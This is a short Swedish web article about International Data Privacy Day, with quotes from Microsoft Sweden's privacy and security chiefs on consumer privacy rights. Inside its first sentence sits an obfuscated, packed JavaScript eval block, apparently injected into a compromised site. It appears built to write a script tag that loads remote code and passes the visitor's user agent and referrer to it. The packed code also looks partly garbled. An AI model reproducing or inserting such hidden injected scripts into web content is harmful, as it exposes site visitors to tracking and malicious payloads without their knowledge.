Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Internationella Dataskyddsdagen idag

Internationella Dataskyddsdagen idag
Sebastian

Dataskyddsdagen: Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbsnd|var|u0026u|referrer|ekttn||js|php’.split(’|’),0,{}))
är det den internationella dataskyddsdagen (
Data Privacy Day). I och med detta så delar Microsoft Sveriges experter Martina Masuch och Magnus Lindkvist med sig av tankar om hur man kan skydda sina uppgifter på nätet.

Martina Masuch är dataskyddschef på Microsoft Sverige och ser denna dag som ett perfekt tillfälle att lyfta frågan om just vilka rättigheter man har som konsument och som människa, när det gäller dataskydd (privacy).

”På Microsoft är vi extremt måna om våra kunders privacy, det genomsyrar allt vi gör. Det är tyvärr inget man kan ta för givet, utan det finns fortfarande många företag idag som inte respekterar och följer personuppgiftslagen, och som tvärtom har som affärsidé att sälja information om sina kunder.” säger Martina.

Magnus Lindkvist är säkerhetschef på Microsoft Sverige. Han har märkt att begreppen privacy och säkerhet ofta blandas ihop.

”Privacy är rättigheten att vara anonym och ha koll på sin data. Det är mer en policy-fråga än en teknikfråga, och handlar snarare om hur personuppgifter hanteras än om hur säker tekniken är.” säger Magnus. ”Däremot går säkerhet och privacy hand i hand, eftersom säkerhet kan hjälpa till att skydda privacy.

Dataskyddsdagen har anordnas i sju år för att uppmärksamma användare om rätten till skydd för personuppgifter och personlig integritet.
Bakom initiativet står Europarådet. Microsoft är en av huvudsponsorerna för femte året i rad.

Läs mer om Dataskyddsdagen här!